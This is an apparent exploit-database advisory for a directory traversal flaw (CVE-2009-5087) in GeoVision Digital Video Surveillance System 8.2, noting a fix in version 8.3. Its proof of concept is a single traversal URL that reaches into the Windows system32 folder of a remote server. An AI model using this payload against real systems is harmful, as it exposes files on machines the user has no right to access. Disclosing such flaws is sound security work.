GeoVision Digital Video Surveillance System 8.2 - Arbitrary File Disclosure

Author: Dejan Levaja
type: remote
platform: windows
port: 
date_added: 2009-02-10  
date_updated: 2017-02-13  
verified: 1  
codes: OSVDB-51886;CVE-2009-5087  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 8041.txt  

Hi.
There is a Directory traversal vulnerability in Geovision Digital Video Surveillance
System (geohttpserver)version 8.2.

POC:
http://remotehost/../../../../../../windows/system32/whatever.something

PATCH:
Vendor has published the new version (8.3)


Regards,
Dejan Levaja
NSS d.o.o.
dejan[dot]levaja[at]netsec[dot]rs

# milw0rm.com [2009-02-11]